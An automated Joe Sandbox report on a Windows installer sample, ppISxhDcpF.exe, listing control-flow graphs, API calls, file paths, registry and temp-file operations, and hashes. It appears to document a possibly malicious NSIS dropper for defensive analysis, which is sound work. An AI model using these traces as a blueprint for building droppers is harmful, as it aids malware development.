                                                                                                                • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 460 402eab-402eb2 451->460 461 402fcd-402fd5 call 402d8a 451->461 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->438 455->453 484 402f92-402f98 455->484 456->453 482 402fd7-402fe8 456->482 462 402eb4-402ec8 call 405be5 460->462 463 402f2e-402f32 460->463 461->453 471 402f3c-402f42 462->471 480 402eca-402ed1 462->480 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 473 402f51-402f5b 471->473 474 402f44-402f4e call 4064dc 471->474 473->448 481 402f61 473->481 474->473 480->471 486 402ed3-402eda 480->486 481->445 487 402ff0-402ff5 482->487 488 402fea 482->488 484->453 484->456 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 493 402eee-402f0e 491->493 496 40301e 492->496 493->453 495 402f14-402f18 493->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->438 497->471 499 402f2a-402f2c 497->499 498->481 498->497 499->471
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ppISxhDcpF.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ppISxhDcpF.exe,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                • String ID: "C:\Users\user\Desktop\ppISxhDcpF.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ppISxhDcpF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 4283519449-2032901591
                                                                                                                • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 837 4017ad-4017ae call 4062e9 831->837 832->837 841 4017b3-4017b7 837->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 851 4017d5-4017e7 842->851 852 4017c5-4017d3 CompareFileTime 842->852 844 4017f5-401811 call 405c2a 843->844 845 4017ef-4017f0 call 405c05 843->845 853 401813-401816 844->853 854 401885-4018ae call 4051b4 call 403027 844->854 845->844 851->843 852->851 855 401867-401871 call 4051b4 853->855 856 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->856 868 4018b0-4018b4 854->868 869 4018b6-4018c2 SetFileTime 854->869 866 40187a-401880 855->866 856->841 888 40185c-40185d 856->888 871 402a55 866->871 868->869 870 4018c8-4018d3 CloseHandle 868->870 869->870 873 4018d9-4018dc 870->873 874 402a4c-402a4f 870->874 875 402a57-402a5b 871->875 877 4018f1-4018f4 call 406077 873->877 878 4018de-4018ef call 406077 lstrcatW 873->878 874->871 884 4018f9-40228d call 40579a 877->884 878->884 884->875 888->866 890 40185f-401860 888->890 890->855
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor,?,?,00000031), ref: 004017A8
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor,?,?,00000031), ref: 004017CD
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,755723A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor$C:\Users\user\AppData\Local\Temp\nscAF7B.tmp$C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dll$Call
                                                                                                                • API String ID: 1941528284-2940166868
                                                                                                                • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 907 40323b-40323f 904->907 910 40321d-403220 905->910 911 4031df-4031e2 905->911 908 403238 906->908 909 4030da-4030e2 906->909 908->907 913 4030e4 909->913 914 4030e7-4030f5 call 403242 909->914 915 403222 910->915 916 403225-40322e call 403242 910->916 911->908 912 4031e4 911->912 917 4031e7-4031ed 912->917 913->914 914->902 926 4030fb-403104 914->926 915->916 916->902 924 403235 916->924 920 4031f1-4031ff call 403242 917->920 921 4031ef 917->921 920->902 929 403201-40320d call 405cdc 920->929 921->920 924->908 928 40310a-40312a call 40654a 926->928 934 403130-403143 GetTickCount 928->934 935 4031d3-4031d5 928->935 936 4031d7-4031d9 929->936 937 40320f-403219 929->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->917 942 40321b 937->942 943 403155-40318b MulDiv wsprintfW call 4051b4 938->943 944 40314f-403153 938->944 940 403192-403196 939->940 941 4031c7-4031cb 939->941 945 403198-40319f call 405cdc 940->945 946 4031ad-4031b8 940->946 941->909 947 4031d1 941->947 942->908 943->939 944->939 944->943 952 4031a4-4031a6 945->952 951 4031bb-4031bf 946->951 947->908 951->928 953 4031c5 951->953 952->936 954 4031a8-4031ab 952->954 953->908 954->951
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                • String ID: jA$ jA$... %d%%
                                                                                                                • API String ID: 551687249-2167919867
                                                                                                                • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 960 402609 958->960 961 40260c-40260f 958->961 962 402a55-402a5b 959->962 960->961 963 402773-40277b 961->963 964 402615-402624 call 405fb5 961->964 963->959 964->963 968 40262a 964->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 972 4026e4-4026f4 call 405cad 970->972 973 4026ce-4026d1 970->973 971->963 974 40265b-402660 971->974 972->963 984 4026f6 972->984 973->972 975 4026d3-4026de call 405d0b 973->975 974->963 977 402666-402674 974->977 975->963 975->972 980 40267a-40268c MultiByteToWideChar 977->980 981 40272f-40273b call 405f9c 977->981 980->984 985 40268e-402691 980->985 981->962 987 4026f9-4026fc 984->987 988 402693-40269e 985->988 987->981 989 4026fe-402703 987->989 988->987 990 4026a0-4026c5 SetFilePointer MultiByteToWideChar 988->990 992 402740-402744 989->992 993 402705-40270a 989->993 990->988 991 4026c7 990->991 991->984 994 402761-40276d SetFilePointer 992->994 995 402746-40274a 992->995 993->992 996 40270c-40271f 993->996 994->963 997 402752-40275f 995->997 998 40274c-402750 995->998 996->963 999 402721-402727 996->999 997->963 998->994 998->997 999->969 1000 40272d 999->1000 1000->963
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                                                  • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                • String ID: 9
                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1010 4023d1-4023de call 402bbf lstrlenW 1008->1010 1011 4023e2-4023e5 1008->1011 1010->1011 1014 4023f5-4023f8 1011->1014 1015 4023e7-4023f4 call 402ba2 1011->1015 1019 402409-40241d RegSetValueExW 1014->1019 1020 4023fa-402404 call 403027 1014->1020 1015->1014 1021 402422-4024fc RegCloseKey 1019->1021 1022 40241f 1019->1022 1020->1019 1021->1009 1026 40281e-402825 1021->1026 1022->1021 1026->1009
                                                                                                                APIs
                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscAF7B.tmp
                                                                                                                • API String ID: 1356686001-558323201
                                                                                                                • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 3449924974-4083868402
                                                                                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1047 1000180c-10001810 1045->1047 1048 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1048 1049 100017d7-100017da 1046->1049 1050 100017be-100017bf 1046->1050 1055 10001812-1000184c call 100015b4 call 100024a9 1047->1055 1056 1000184e-10001854 call 100024a9 1047->1056 1073 10001855-10001859 1048->1073 1049->1045 1051 100017dc-100017dd call 10002b5f 1049->1051 1053 100017c1-100017c2 1050->1053 1054 100017c7-100017c8 call 100028a4 1050->1054 1065 100017e2 1051->1065 1061 100017c4-100017c5 1053->1061 1062 100017cf-100017d5 call 10002645 1053->1062 1068 100017cd 1054->1068 1055->1073 1056->1073 1061->1045 1061->1054 1072 100017e4 1062->1072 1065->1072 1068->1065 1072->1045 1076 10001896-1000189d 1073->1076 1077 1000185b-10001869 call 1000246c 1073->1077 1076->1037 1079 1000189f-100018a0 GlobalFree 1076->1079 1083 10001881-10001888 1077->1083 1084 1000186b-1000186e 1077->1084 1079->1037 1083->1076 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1088 1000187a-1000187b FreeLibrary 1085->1088 1086->1076 1088->1083
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1791698881-3916222277
                                                                                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1090 405c59-405c65 1091 405c66-405c9a GetTickCount GetTempFileNameW 1090->1091 1092 405ca9-405cab 1091->1092 1093 405c9c-405c9e 1091->1093 1095 405ca3-405ca6 1092->1095 1093->1091 1094 405ca0 1093->1094 1094->1095
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
